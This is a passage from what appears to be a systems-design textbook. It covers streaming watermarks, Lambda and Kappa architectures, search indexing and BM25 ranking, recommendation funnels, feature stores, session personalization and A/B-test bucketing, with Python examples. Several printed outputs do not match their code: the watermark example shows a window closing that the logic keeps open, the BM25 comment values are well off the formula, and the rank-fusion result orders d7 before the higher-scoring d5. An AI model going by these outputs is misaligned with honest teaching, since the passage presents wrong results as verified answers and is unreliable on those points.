event bridges two open sessions. And every window needs an eviction rule: state
for a closed window must be cleared after its allowed lateness expires, or the job
leaks memory until it dies days later.
Key Takeaways
- Windowing makes an unbounded stream aggregatable by slicing it into bounded chunks.
- Tumbling windows partition the timeline and are right for periodic reporting.
- Sliding windows overlap and suit alerting, at a cost proportional to size/hop.
- Session windows are data-defined by an inactivity gap and model user behaviour; they may merge when a late event bridges two sessions.
- Open windows are keys x windows per key — that product, plus an eviction rule, determines whether the job stays within memory.
🧪 Practice
- Choose a window type for each: hourly revenue reporting, "5 failed logins in 2 minutes" alerting, and average time spent per visit.
- Compute how many windows a single event belongs to for a 10-minute window hopping every 30 seconds, and the memory implication for 1M keys.
- Interview: Your session-window job's memory grows without bound. What are the likely causes? (Hint: think about keys that never see another event, and about when state for a closed window is actually allowed to be deleted.)
Watermarks and Late Data
Windows raise a question batch systems never face: when is a window done? Events do not arrive in the order they happened. A phone goes through a tunnel and uploads twenty minutes of events at once; a partition is re-consumed after a restart; one region's network is slow. So the system must distinguish event time (when it happened, stamped at the source) from processing time (when the engine saw it). Aggregating by processing time is easy and produces results that change depending on how fast your cluster was that day — which makes them irreproducible.
A watermark is the engine's assertion that no event with a timestamp earlier
than W is expected any more. It is a heuristic, not a fact: it is generated from
observed timestamps minus an allowed lateness, and it is the mechanism that lets
the system close a window and emit a result. Watermarks make the fundamental
trade-off explicit — a conservative watermark waits longer and is more complete;
an aggressive one emits sooner and is more likely wrong.
EVENT TIME vs PROCESSING TIME
processing time -->
arrives: e(10) e(12) e(11) e(21) e(14)! e(25) e(9)!!
^ ^
late but within very late, beyond
allowed lateness lateness -> dropped
or sent to side output
watermark = max_seen_event_time - 5
after e(21): watermark = 16 -> window [0,10) and [10,20) can close
e(14) arrives after wm=16 -> LATE. If the window is retained, re-emit an
updated result; otherwise it is dropped.
+----------------------- allowed lateness (window kept in state) ----+
window closes -----------------------------------------------> state evicted
class WatermarkTracker:
"""Bounded-out-of-orderness watermark: the standard heuristic."""
def __init__(self, max_out_of_order_s: int, allowed_lateness_s: int):
self.max_ooo = max_out_of_order_s
self.lateness = allowed_lateness_s
self.max_event_ts = 0
self.windows: dict[int, int] = {} # window start -> count
self.emitted: set[int] = set()
def watermark(self) -> int:
return self.max_event_ts - self.max_ooo
def on_event(self, ts: int, size: int = 10):
self.max_event_ts = max(self.max_event_ts, ts)
start = (ts // size) * size
wm = self.watermark()
if start + size + self.lateness < wm:
return "DROPPED (beyond allowed lateness)" # never silently ignore
self.windows[start] = self.windows.get(start, 0) + 1
if start in self.emitted:
# Window already emitted: this is late data. Emit a correction —
# only safe if the downstream sink accepts updates (upsert).
return f"LATE -> re-emit window {start} = {self.windows[start]}"
return f"buffered in window {start}"
def advance(self, size: int = 10):
"""Close every window whose end is below the watermark."""
wm, out = self.watermark(), []
for start, count in sorted(self.windows.items()):
if start + size <= wm and start not in self.emitted:
self.emitted.add(start)
out.append((start, count))
return out
t = WatermarkTracker(max_out_of_order_s=5, allowed_lateness_s=20)
for ts in (10, 12, 11, 21):
t.on_event(ts)
print(t.advance()) # [(10, 3)] -> window [10,20) closes at wm=16
print(t.on_event(14)) # LATE -> re-emit window 10 = 4
print(t.on_event(9)) # window [0,10) is still within lateness
Handling late data is a product decision expressed in three parts. Allowed lateness says how long a window's state is retained for corrections — longer means more memory. Triggers say when to emit: once at the watermark, early and repeatedly for a live-updating dashboard, or again on each late arrival. Accumulation mode says what a re-emission means — a complete restatement of the window (the sink upserts) or a delta to be added (the sink accumulates). Getting these three consistent is what separates a dashboard that converges on the truth from one that double-counts.
One operational trap deserves naming: a watermark advances from observed data, so an idle partition produces no events and holds the global watermark back, stalling every window across the job. Engines provide idleness detection to exclude such partitions; without it, one quiet shard silently freezes all output.
Key Takeaways
- Event time is when it happened, processing time is when you saw it; only event time gives reproducible results.
- A watermark is a heuristic assertion that no earlier events remain — it trades completeness against latency.
- Allowed lateness sets how long window state is kept for corrections; beyond it, route late events to a side output rather than dropping silently.
- Triggers control when results are emitted, accumulation mode controls whether a re-emission replaces or adds.
- An idle source partition can freeze the global watermark and stall all output.
🧪 Practice
- Given events arriving at event times 10, 12, 11, 21, 14 with a 5-second out-of-orderness bound, state the watermark after each and which windows close.
- Choose an allowed lateness for mobile analytics where phones can be offline for hours, and describe the memory consequence.
- Interview: Your streaming counts disagree with the nightly batch counts by 0.3%. What is the most likely explanation? (Hint: think about which events the batch job can see that the stream had already decided were too late.)
Lambda and Kappa Architectures
Streaming gives you fresh answers; batch gives you complete, easily corrected ones. For years no single system did both well, and the architectural patterns that emerged are still the clearest way to reason about the trade-off — even where modern engines have narrowed the gap.
Lambda architecture runs both. A batch layer recomputes authoritative views from the full immutable dataset on a schedule; a speed layer computes approximate views over recent events with low latency; a serving layer merges them, using batch results wherever they exist and the speed layer only for the window the batch job has not yet covered. The batch layer's recomputation is a self-healing property: any error in the speed layer is erased by the next batch run.
The cost is the reason Lambda fell out of favour: every piece of business logic exists twice, in two languages, on two engines, maintained by people who must keep them semantically identical. They drift. The drift shows up as numbers that disagree at the boundary, and debugging it means reasoning about two systems at once.
Kappa architecture removes the batch layer. There is one streaming pipeline and one implementation of the logic; the durable, replayable log is the source of truth. "Batch" becomes a special case — reprocessing means replaying the log from the beginning through a new version of the job, writing to a new output table, and switching readers when it catches up. This is the same blue-green idea as deployment (12.3), applied to derived data.
LAMBDA KAPPA
events events
| |
+--> [ batch layer ] v
| full recompute +--------------+
| hours, exact | durable log | <- retained long enough
| | | (Kafka etc.) | to replay everything
| v +------+-------+
| [ batch views ] |
| | +-----+------+
+--> [ speed layer ] --+ | |
seconds, | [ job v1 ] [ job v2 ] <- reprocessing is
approximate | (serving) (replay) just a second
| | | | instance
v v v v
[ serving layer: merge ] table_v1 table_v2
| \ /
v switch readers when v2 catches up
consumers |
v
Two codebases, one truth. One codebase, one truth.
def serving_read(key: str, batch_view: dict, speed_view: dict,
batch_watermark_ts: int) -> dict:
"""Lambda serving layer: batch results are authoritative up to its
watermark; the speed layer covers only the gap after it."""
base = batch_view.get(key, {"count": 0, "as_of": batch_watermark_ts})
delta = sum(v["count"] for v in speed_view.get(key, [])
if v["ts"] > batch_watermark_ts) # avoid double counting
return {"count": base["count"] + delta, "exact_through": batch_watermark_ts}
def kappa_reprocess(log, new_job, new_table, live_table):
"""Kappa reprocessing: replay from offset 0 into a fresh table, then switch."""
for record in log.replay(from_offset=0):
new_job.process(record, sink=new_table)
if new_table.lag_seconds() < 60: # caught up with the live pipeline
return promote(new_table, replaces=live_table) # atomic pointer swap
return "still catching up"
| Concern | Lambda | Kappa |
|---|---|---|
| Codebases for logic | Two | One |
| Correcting a bug | Next batch run heals it | Replay the log into a new table |
| Storage requirement | Full historical dataset | Log retention long enough to replay |
| Reprocessing cost | Routine, already scheduled | A burst of compute on demand |
| Late data | Batch layer absorbs it | Watermarks and allowed lateness |
| Operational burden | Two systems in sync | One system, longer retention |
Kappa is the better default when the log can retain enough history and the logic is expressible in streaming SQL. Lambda-shaped designs persist where the batch computation is genuinely different in kind — a model retrain, a graph algorithm, a full-table reconciliation against an external system of record. The lakehouse (14.1.3) has softened the distinction further: one table can be appended to by a stream and rewritten by a batch job under the same transaction log, so the "two layers" become two writers to one destination rather than two serving paths.
Key Takeaways
- Lambda runs batch and streaming layers in parallel and merges them; batch recomputation self-heals speed-layer errors.
- Lambda's fatal cost is duplicated business logic that inevitably drifts.
- Kappa keeps one streaming implementation and treats reprocessing as replaying the log into a new table, then switching readers.
- Kappa's prerequisite is log retention long enough to replay the history you care about.
- Lakehouse table formats blur the split: one table, two writers, one transaction log.
🧪 Practice
- Take a metric computed both in a nightly job and a live dashboard, and list every place the two implementations could diverge.
- Compute the log retention and storage needed to replay 90 days at 50k events/sec and 400 bytes per event.
- Interview: You found a bug in a streaming aggregation that has been running for a month. How do you correct the historical output? (Hint: think about what you would need to have retained, and how you would cut consumers over without a period of visibly wrong numbers.)
<a id="143-search-and-recommendation-systems"></a>
14.3 Search and Recommendation Systems
Search and recommendation are the same system viewed from two ends: both reduce millions of candidate items to a short ordered list, under a latency budget, using signals computed elsewhere. This subchapter covers how documents get into an index, how ranking is served under that budget, the multi-stage funnel that makes the scale tractable, the feature infrastructure both stages depend on, how personalization stays fresh, and the experimentation platform without which none of it can be shown to work.
Indexing Pipelines
A search engine cannot scan every document per query, so it inverts the problem ahead of time. An inverted index maps each term to a posting list of the documents containing it, so answering "invoices about refunds" becomes intersecting two short lists instead of reading every document. Everything in search performance follows from that inversion — and from keeping it current.
The indexing pipeline is what turns source records into that structure. Documents are ingested (bulk backfill or incremental change events), normalized (lower casing, Unicode folding, HTML stripping), analyzed into tokens (tokenization, stemming or lemmatization, stop-word handling, n-grams for partial matching), enriched with data the ranker will need (category, popularity, embeddings), and finally written into index segments. Segments are immutable: new documents go into new small segments, deletions are recorded as tombstones, and background merges compact many small segments into fewer large ones. Immutability is what lets readers run lock-free while writers append.
INDEXING PIPELINE
source DB / event stream
| CDC or bulk export
v
[ normalize ] -> [ analyze ] -> [ enrich ] -> [ build segment ] -> [ commit ]
lowercase tokenize category, immutable file visible
strip HTML stem popularity, + tombstones to readers
fold Unicode stop-words embedding
INVERTED INDEX (term -> postings)
"refund" -> [ doc3(tf=2), doc7(tf=1), doc9(tf=5) ]
"invoice" -> [ doc1(tf=1), doc3(tf=3), doc9(tf=1) ]
query "refund invoice" = intersect postings -> {doc3, doc9}
Postings are sorted by doc id and delta-compressed, so intersection is a
linear merge over the SHORTEST list first.
from collections import defaultdict
STOP = {"the", "a", "of", "and"}
def analyze(text: str) -> list[str]:
"""Analysis must be IDENTICAL at index and query time. A mismatch here is
the single most common cause of 'why does this document not match?'."""
tokens = [t.strip(".,!?").lower() for t in text.split()]
tokens = [t for t in tokens if t and t not in STOP]
return [t[:-1] if t.endswith("s") and len(t) > 3 else t for t in tokens]
class Index:
def __init__(self):
self.postings: dict[str, dict[int, int]] = defaultdict(dict)
self.deleted: set[int] = set() # tombstones; purged at merge time
self.doc_len: dict[int, int] = {}
def add(self, doc_id: int, text: str) -> None:
terms = analyze(text)
self.doc_len[doc_id] = len(terms)
for t in terms:
self.postings[t][doc_id] = self.postings[t].get(doc_id, 0) + 1
def delete(self, doc_id: int) -> None:
self.deleted.add(doc_id) # cheap: no segment rewrite
def search(self, query: str) -> list[int]:
lists = [self.postings.get(t, {}) for t in analyze(query)]
if not lists or any(not l for l in lists):
return []
lists.sort(key=len) # start from the shortest list
hits = set(lists[0])
for l in lists[1:]:
hits &= l.keys() # intersect, shrinking as we go
return sorted(hits - self.deleted)
idx = Index()
idx.add(1, "The invoice was paid")
idx.add(3, "Refunds and invoices for the refund request")
idx.add(9, "Refund policy of the invoice")
print(idx.search("refund invoice")) # [3, 9]
The operationally interesting property is freshness, and it is bought at a cost. Committing a segment makes it visible but is expensive, so engines batch commits — a refresh interval of one second is typical, which means a document written now is searchable roughly a second later, not instantly. Systems that need true read-your-writes usually overlay a small in-memory buffer of very recent changes on top of the index at query time.
Two more realities shape production indexing. Reindexing is routine: any change to the analyzer, the schema, or an enrichment field requires rebuilding, which is done by building a new index alongside the old one and switching an alias atomically once it is verified — never by mutating in place. And partial updates are a lie in most engines: changing one field re-indexes the whole document, so put volatile signals (view counts, prices) in a separate store the ranker reads at query time rather than inside the document.
Key Takeaways
- An inverted index maps terms to posting lists, turning search into a list intersection instead of a scan.
- Segments are immutable; writes append and deletes tombstone, with background merges compacting them.
- Index-time and query-time analysis must match exactly, or documents silently fail to match.
- Freshness is a commit-interval trade-off, not a free property; overlay recent writes if you need read-your-writes.
- Reindex into a new index and swap an alias; never mutate an index in place.
- Keep volatile signals out of the document — they force full re-indexing.
🧪 Practice
- Build an inverted index by hand for five short documents and execute a two-term query against it, starting from the shorter posting list.
- Describe the migration steps for changing the stemming rules on a live index with zero downtime.
- Interview: A newly created record is not searchable for a few seconds. Is this a bug? (Hint: think about what makes a segment visible to readers, and what you would give up to make it instant.)
Ranking and Relevance Serving
Retrieval decides which documents can match; ranking decides which ones the user sees. Since almost nobody looks past the first few results, ranking quality is effectively the product. The engineering problem is that ranking must be both good and fast: a scoring function that considers a hundred signals cannot be run over a million matching documents inside a 150 ms budget.
Classical lexical ranking uses BM25, a refinement of TF-IDF. Its intuition is worth internalizing because it explains most "why did this rank first?" questions. A term matters more when it appears often in a document (term frequency, with diminishing returns — the tenth occurrence adds little), less when it appears in many documents (inverse document frequency — "the" discriminates nothing), and document length is normalized so a long document does not win merely by containing more words.
import math
def bm25(tf: int, doc_len: int, avg_len: float, n_docs: int, n_with_term: int,
k1: float = 1.2, b: float = 0.75) -> float:
"""k1 controls how fast term-frequency saturates; b controls how strongly
length is normalized (b=0 -> no normalization, b=1 -> full)."""
idf = math.log(1 + (n_docs - n_with_term + 0.5) / (n_with_term + 0.5))
norm = tf * (k1 + 1) / (tf + k1 * (1 - b + b * doc_len / avg_len))
return idf * norm
# Same term frequency, different rarity: the rare term dominates the score.
print(round(bm25(tf=3, doc_len=300, avg_len=250, n_docs=1e6, n_with_term=900_000), 3))
print(round(bm25(tf=3, doc_len=300, avg_len=250, n_docs=1e6, n_with_term=120), 3))
# 0.115 <- common term contributes almost nothing
# 8.203 <- rare term carries the match
Lexical scoring fails on vocabulary mismatch: a query for "laptop" does not match a document saying "notebook computer". Semantic (vector) retrieval embeds query and documents into a shared space where meaning, not spelling, determines proximity (14.4.5). Neither approach dominates — lexical is precise on exact identifiers, part numbers, and names; semantic handles paraphrase and intent — so production systems run hybrid retrieval and fuse the two result sets. The standard fusion technique is reciprocal rank fusion, which combines by rank rather than by score and therefore needs no score calibration between systems.
def reciprocal_rank_fusion(rankings: list[list[str]], k: int = 60) -> list[str]:
"""Fuse ranked lists from lexical and vector retrieval.
Uses only positions, so incomparable score scales do not matter."""
scores: dict[str, float] = {}
for ranking in rankings:
for rank, doc_id in enumerate(ranking, start=1):
scores[doc_id] = scores.get(doc_id, 0.0) + 1.0 / (k + rank)
return sorted(scores, key=scores.get, reverse=True)
lexical = ["d9", "d3", "d7", "d1"]
vector = ["d3", "d5", "d9", "d2"]
print(reciprocal_rank_fusion([lexical, vector])[:4]) # ['d3', 'd9', 'd7', 'd5']
Serving architecture follows from the index being too big for one machine. The index is sharded by document, each shard is replicated for throughput and availability, and a coordinator fans out to one replica per shard, merges the top-k from each, and returns the global top-k. This is a textbook fan-out, which means it inherits tail-latency amplification (13.1.2): the query is as slow as its slowest shard.
SEARCH SERVING PATH (budget: 150 ms p95)
query -> [ understanding: spellcheck, synonyms, intent ] ~10 ms
|
v fan-out to every shard, one replica each
+-----+-----+-----+-----+
| s0 | s1 | s2 | s3 | each returns its LOCAL top-100 ~40 ms
+-----+-----+-----+-----+ (cheap BM25 / ANN scoring)
|
v coordinator merges 400 -> global top-100
[ re-rank top-100 with the expensive model ] ~60 ms
|
v
[ blend, dedupe, apply business rules, paginate ] ~15 ms
Tail control: hedge the slowest shard, and enforce a per-shard deadline that
returns partial results rather than failing the whole query.
Two production disciplines round this out. Relevance is measured, not asserted: offline with graded judgements (NDCG, MRR, recall@k) over a fixed query set, and online with engagement metrics via experiments (14.3.6) — because offline gains routinely fail to reproduce online. And business rules belong after ranking, as an explicit blending or filtering stage — pinning, freshness boosts, inventory filters, and diversity constraints applied post-hoc keep the learned model's behaviour understandable rather than entangled with policy.
Key Takeaways
- Retrieval selects candidates, ranking orders them; ranking quality is what users perceive as the product.
- BM25 balances term frequency saturation, inverse document frequency, and length normalization.
- Lexical and semantic retrieval fail differently — hybrid retrieval with reciprocal rank fusion combines them without score calibration.
- Sharded fan-out inherits tail amplification: use per-shard deadlines, partial results, and hedging.
- Measure relevance offline with NDCG-style metrics and confirm online with experiments; offline wins often do not transfer.
- Keep business rules in an explicit post-ranking stage, not inside the model.
🧪 Practice
- Compute BM25 contributions for a common and a rare term at equal term frequency, and explain the ordering that results.
- Design the fan-out path for a 40-shard index with a 150 ms budget, stating the per-shard deadline and the partial-result policy.
- Interview: Users complain that searching an exact product code returns unrelated items. What went wrong? (Hint: think about which retrieval mode is good at exact tokens, and what an analyzer or an embedding does to a string like
XR-4410-B.)
Candidate Generation and Re-Ranking
Recommendation faces a harder version of search's problem: there is no query text, and the catalogue may hold hundreds of millions of items. Scoring every item with a good model for every request is off by several orders of magnitude — a 1 ms model over 100M items is 100,000 seconds per request. The universal solution is a funnel: a few stages, each cheaper per item than the next and each narrowing the set, so expensive computation is spent only where it changes the outcome.
Candidate generation (retrieval) cuts 100M items to a few hundred or thousand using methods that are sublinear in catalogue size: approximate nearest neighbour lookup over embeddings, co-visitation and collaborative-filtering tables built offline, inverted-index lookups on attributes, plus deliberate sources like trending, recently viewed, and editorially curated items. Multiple generators run in parallel and their outputs are unioned — each covers a different failure mode, and diversity of sources is what keeps recommendations from collapsing onto one behaviour.
Ranking scores those few hundred candidates with a real model over rich features (user history, item attributes, context, cross features). Re-ranking then adjusts the ordered list for properties that only exist at the list level: diversity (not five items from one seller), business constraints (inventory, margin, contractual promotions), de-duplication, and exploration slots for items with little feedback.
THE RECOMMENDATION FUNNEL
catalogue 100,000,000 items
| candidate generation: ANN + co-visitation + trending + recent
| cost per item: microseconds, sublinear in catalogue size
v
candidates 1,000
| ranking: gradient-boosted trees or a neural model,
| ~100 features per item, ~1 ms per batch of 1,000
v
ranked 200
| re-ranking: diversity, business rules, dedupe, exploration
| operates on the LIST, not on items independently
v
final 20 -> rendered
RECALL is set here ---^ (an item missed in generation can never be shown,
no matter how good the ranker is). PRECISION is set by ranking.
from dataclasses import dataclass
@dataclass
class Item:
id: str
score: float
seller: str
category: str
def maximal_marginal_relevance(items: list[Item], k: int,
lambda_: float = 0.7) -> list[Item]:
"""Balance relevance against redundancy. lambda_=1 is pure relevance;
lower values force diversity by penalising similarity to what is already
selected."""
selected: list[Item] = []
pool = sorted(items, key=lambda i: -i.score)
while pool and len(selected) < k:
best, best_val = None, float("-inf")
for cand in pool:
sim = max((similarity(cand, s) for s in selected), default=0.0)
value = lambda_ * cand.score - (1 - lambda_) * sim
if value > best_val:
best, best_val = cand, value
selected.append(best)
pool.remove(best)
return selected
def similarity(a: Item, b: Item) -> float:
return 0.6 * (a.seller == b.seller) + 0.4 * (a.category == b.category)
cands = [Item("i1", 0.95, "acme", "shoes"), Item("i2", 0.94, "acme", "shoes"),
Item("i3", 0.93, "acme", "shoes"), Item("i4", 0.80, "globex", "bags"),
Item("i5", 0.78, "initech", "hats")]
print([i.id for i in maximal_marginal_relevance(cands, k=3)])
# ['i1', 'i4', 'i5'] — pure relevance would have returned three acme shoes
Two structural points make the funnel work in practice. First, recall is determined at the top and can never be recovered: an item not generated cannot be ranked, so candidate generation should over-generate relative to intuition and be monitored with recall@k against what the ranker eventually liked. Second, the funnel needs exploration. A system trained only on what it previously showed enters a feedback loop where unshown items never accumulate the engagement data that would let them be shown; reserving a small fraction of slots for under-explored items (or using a bandit policy) is what keeps the catalogue from ossifying.
The cold-start problem sits in the same place. For new items, generation must fall back on content-based signals (attributes, text and image embeddings) rather than interaction history; for new users, on context — locale, device, referrer, the first few in-session actions — with popularity as the base case. A recommender without an explicit cold-start path silently ignores everything recently added.
Key Takeaways
- Multi-stage funnels make recommendation tractable: cheap generation narrows, expensive ranking orders, list-level re-ranking adjusts.
- Candidate generation sets the recall ceiling — a missed item can never be recovered downstream.
- Run several generators in parallel; each covers a different failure mode.
- Re-ranking handles properties that only exist across a list: diversity, business rules, dedupe.
- Without exploration slots, the system trains on its own output and the catalogue ossifies.
- Cold start needs an explicit content-based and contextual path.
🧪 Practice
- Size a funnel for a 10M-item catalogue under a 100 ms budget: choose stage widths and the per-item cost each stage can afford.
- Implement a diversity constraint that caps items per seller in the top 10, and describe how it changes the observed click-through rate.
- Interview: Recommendations feel repetitive and never surface new items. Diagnose it. (Hint: think about where new items would have to enter the funnel, and what data they lack that the ranker depends on.)
Feature Stores
The subtle failure in production ML is not a bad model; it is a good model fed
slightly different data at serving time than at training time. Training reads
avg_order_value_30d from a warehouse table computed with a nightly SQL job;
serving computes it in application code from a Redis counter. The two definitions
diverge by a boundary condition, and model quality drops in a way no test catches.
This is training-serving skew, and a feature store exists to make it
structurally impossible.
A feature store provides one definition of each feature, materialized into two stores that share it. The offline store (warehouse or lakehouse) holds full history and serves training set construction; the online store (a low-latency key-value store) holds only the current value per entity and serves inference in single-digit milliseconds. One pipeline writes both, so both agree by construction.
FEATURE STORE
raw events / tables
|
[ ONE feature definition: name, entity, transformation, TTL ]
|
+-----+-----------------------------+
| |
v v
OFFLINE STORE ONLINE STORE
(warehouse: full history, (Redis/DynamoDB: latest value
point-in-time correct) per entity, ms reads)
| |
v v
training set construction inference: get_online_features(user_42)
| |
+---------> SAME VALUES <-----------+ <- the whole point
The hardest correctness property a feature store provides is point-in-time correctness. When building a training row for an event at time T, every feature must carry the value it had at T — not the value it has now. Joining on the entity key alone leaks future information into training, the model looks excellent offline, and it collapses in production. This is label leakage, and it is the most expensive silent bug in applied ML.
from bisect import bisect_right
from dataclasses import dataclass
@dataclass
class FeatureValue:
ts: int
value: float
def point_in_time_lookup(history: list[FeatureValue], event_ts: int,
max_staleness: int | None = None) -> float | None:
"""Return the feature value KNOWN AT event_ts — never a later one.
`history` must be sorted by ts."""
times = [f.ts for f in history]
i = bisect_right(times, event_ts) - 1 # last value at or before T
if i < 0:
return None # feature did not exist yet
fv = history[i]
if max_staleness is not None and event_ts - fv.ts > max_staleness:
return None # too old to be meaningful
return fv.value
hist = [FeatureValue(100, 1.0), FeatureValue(200, 2.0), FeatureValue(300, 3.0)]
print(point_in_time_lookup(hist, event_ts=250)) # 2.0 correct
print(hist[-1].value) # 3.0 <- the leaky shortcut:
# using the latest value trains the model on information from the future.
Features are typically grouped by how they are computed: batch features (aggregations over days of history, recomputed on a schedule), streaming features (windowed aggregates updated within seconds), and on-demand features (computed at request time from the request itself — device, time of day, the current cart). The store should also hold metadata that makes features reusable: owner, freshness SLA, description, and which models consume it, so that deprecating a feature is a lookup rather than an archaeology project.
Whether to adopt a dedicated feature store platform is a scale question. With one model and three features, a shared SQL definition plus a documented online write path is sufficient. The platform pays for itself when many models share features, when point-in-time joins are being written by hand repeatedly, or when nobody can say which pipeline produces a given value.
Key Takeaways
- A feature store's purpose is one definition of each feature serving both training and inference, eliminating training-serving skew.
- Offline store = full history for training; online store = latest value for millisecond inference; one pipeline writes both.
- Point-in-time correctness is mandatory: joining on the entity key alone leaks future information and inflates offline metrics.
- Features divide into batch, streaming, and on-demand, with different freshness guarantees.
- Metadata — owner, freshness SLA, consumers — is what makes features reusable and safely deprecable.
🧪 Practice
- Write the offline and online definitions for "number of purchases in the last 7 days" and identify where the two could drift.
- Construct a training row with a point-in-time join and show numerically what a naive latest-value join would leak.
- Interview: A model scores 0.92 AUC offline and barely beats random online. What do you check first? (Hint: think about whether any feature in training could only have been known after the label was determined.)
Real-Time Personalization
Batch personalization computes recommendations nightly and serves them all day. That is adequate for stable preferences and useless for intent, which changes within a session: a user who has viewed three tents in five minutes wants camping gear now, not the reading recommendations computed at 3 a.m. Real-time personalization closes that loop, and the engineering question is which parts of the loop must be fast — because making all of it fast is unnecessary and expensive.
The workable decomposition splits the system by rate of change. Expensive, slow-moving artefacts — model weights, item embeddings, co-visitation tables — are computed offline. Fast-moving state — the events of the current session — is maintained online and combined with those artefacts at request time. The model does not need retraining to react; it needs the session's features to be current.
TWO LOOPS AT DIFFERENT SPEEDS
SLOW LOOP (hours/days) FAST LOOP (seconds)
--------------------- -------------------
event history --> training click/view/add-to-cart
| |
v v <100 ms
model weights, item embeddings, [ stream processor ]
co-visitation tables | session aggregates
| v
+--------------+ [ online store: user:42 -> {viewed: [...],
| session_intent: "camping", cart: [...] } ]
v |
[ inference at request time ] <+
| slow artefacts x fresh session state
v
personalized results
import time
from collections import deque
class SessionState:
"""Online session features: bounded, TTL'd, and cheap to update.
Kept in the online store keyed by user or device, with a short TTL so an
abandoned session does not personalize tomorrow's visit."""
MAX_EVENTS = 50
TTL_S = 30 * 60
def __init__(self):
self.events: deque = deque(maxlen=self.MAX_EVENTS) # bounded memory
self.last_seen = time.time()
def record(self, event_type: str, item_id: str, category: str) -> None:
now = time.time()
if now - self.last_seen > self.TTL_S:
self.events.clear() # stale session: start fresh
self.events.append((now, event_type, item_id, category))
self.last_seen = now
def features(self) -> dict:
weights = {"view": 1.0, "add_to_cart": 4.0, "purchase": 8.0}
by_cat: dict[str, float] = {}
now = time.time()
for ts, etype, _item, cat in self.events:
# Exponential recency decay: 5-minute half-life, so intent from
# 20 minutes ago counts far less than the last two clicks.
decay = 0.5 ** ((now - ts) / 300)
by_cat[cat] = by_cat.get(cat, 0.0) + weights.get(etype, 1.0) * decay
top = max(by_cat, key=by_cat.get) if by_cat else None
return {"session_intent": top,
"intent_strength": round(by_cat.get(top, 0.0), 2) if top else 0.0,
"recent_items": [e[2] for e in list(self.events)[-5:]]}
s = SessionState()
for etype, item, cat in [("view", "t1", "camping"), ("view", "t2", "camping"),
("add_to_cart", "t2", "camping"), ("view", "b9", "books")]:
s.record(etype, item, cat)
print(s.features())
# {'session_intent': 'camping', 'intent_strength': 6.0, 'recent_items': [...]}
Three constraints dominate the design. Latency: personalization sits on the request path, so the online feature read plus scoring must fit the page budget (13.1.1) — one round trip to the online store, batched, not one per candidate. Cost: recomputing everything per request is unaffordable, so cache the expensive parts keyed by (user, context) with a short TTL and invalidate on significant events. Graceful degradation: if the online store is slow or the session is empty, fall back to segment-level or popularity-based results rather than failing the page — personalization is an enhancement, and a page that fails to render because a recommender timed out is a worse outcome than a generic one.
Finally, real-time personalization amplifies feedback loops. Reacting instantly to the last click can trap a user in a narrow slice of the catalogue — the "I bought one fridge, now everything is fridges" failure. Counter it deliberately: decay intent over time (as above), suppress items already purchased, blend session signals with longer-term preferences, and keep the exploration slots from 14.3.3.
Key Takeaways
- Split the system by rate of change: train models offline, keep session state online, and combine them at request time.
- Freshness of features, not of model weights, is what makes personalization feel responsive.
- Bound session state with a size cap and a TTL, and decay signals by recency.
- Budget one batched online-store read on the request path, and cache expensive intermediate results with short TTLs.
- Always degrade to segment or popularity results rather than failing the page.
- Instant reaction narrows the catalogue: decay intent, suppress purchased items, and keep exploring.
🧪 Practice
- Define the session features you would maintain for a travel booking site, with their TTLs and decay behaviour.
- Design the fallback chain for the recommendation widget when the online store exceeds its deadline.
- Interview: A user buys a washing machine and now sees only washing machines. How do you fix this? (Hint: think about which post-purchase signal should suppress a category, and how long that suppression should last.)
A/B Testing Infrastructure
Every claim in the previous five topics — a better ranker, fresher features, more diversity — is a hypothesis until it is measured on real users. Offline metrics routinely disagree with online outcomes, because offline evaluation cannot model how users respond to a changed interface. A/B testing infrastructure is the system that turns opinions into measured deltas, and it is as much a piece of production engineering as the ranker itself.
The core mechanism is random assignment that is deterministic and sticky: the same user must get the same variant on every request, across devices and sessions, without a database lookup on the request path. Hashing the unit ID with the experiment ID gives exactly that — stable, uniform, independent across experiments, and computable in microseconds.
import hashlib
def assign(unit_id: str, experiment_id: str, variants: dict[str, float]) -> str:
"""Deterministic, sticky, salted-per-experiment bucketing.
Salting by experiment_id makes assignments INDEPENDENT across experiments —
without it, the same users always land in the same bucket everywhere and
experiments become correlated."""
digest = hashlib.sha256(f"{experiment_id}:{unit_id}".encode()).hexdigest()
point = int(digest[:16], 16) / 2 ** 64 # uniform in [0, 1)
cumulative = 0.0
for name, share in variants.items():
cumulative += share
if point < cumulative:
return name
return "control"
variants = {"control": 0.5, "treatment": 0.5}
counts = {"control": 0, "treatment": 0}
for i in range(100_000):
counts[assign(f"user-{i}", "ranker_v4", variants)] += 1
print(counts) # ~50/50, and stable across restarts
# The same user gets DIFFERENT buckets in different experiments:
print(assign("user-7", "ranker_v4", variants),
assign("user-7", "checkout_copy", variants))
The design decisions that matter most are usually not statistical. The randomization unit must match the level at which the effect and the user experience occur: user-level for anything visible in the interface, session-level only for effects that cannot leak across sessions, and cluster-level (household, city, market) when treated users interact with untreated ones — a marketplace change affects both sides, and user-level randomization then violates the independence the statistics assume. Guardrail metrics — latency, error rate, crash rate, revenue — must be evaluated alongside the target metric so a variant that raises clicks by slowing the page is caught rather than shipped.
EXPERIMENT LIFECYCLE
hypothesis + primary metric + MDE + guardrails, written down BEFORE launch
|
v
[ A/A test ] validate the pipeline: two identical variants must show no
| significant difference (if they do, assignment or logging is broken)
v
[ ramp: 1% -> 5% -> 50% ] each step gated on guardrails, not on the win
|
v
[ run to the pre-computed sample size ] <- no peeking-and-stopping
|
v
[ analyse: primary + guardrails + key segments ] -> ship / iterate / kill
import math
def sample_size_per_arm(baseline_rate: float, mde_relative: float,
alpha: float = 0.05, power: float = 0.8) -> int:
"""How many units per arm are needed to detect a relative lift of
`mde_relative`. Compute this BEFORE launching — it tells you whether the
experiment is even feasible with your traffic."""
z_a, z_b = 1.96, 0.84 # two-sided alpha=0.05, power=0.8
p1 = baseline_rate
p2 = baseline_rate * (1 + mde_relative)
p_bar = (p1 + p2) / 2
num = (z_a * math.sqrt(2 * p_bar * (1 - p_bar))
+ z_b * math.sqrt(p1 * (1 - p1) + p2 * (1 - p2))) ** 2
return math.ceil(num / (p2 - p1) ** 2)
print(sample_size_per_arm(0.10, 0.05)) # 5% lift on a 10% rate: ~ 61,000/arm
print(sample_size_per_arm(0.10, 0.01)) # 1% lift: ~1,500,000/arm
# Small effects are expensive to detect. If the traffic is not there, the
# honest conclusion is that the experiment cannot answer the question.
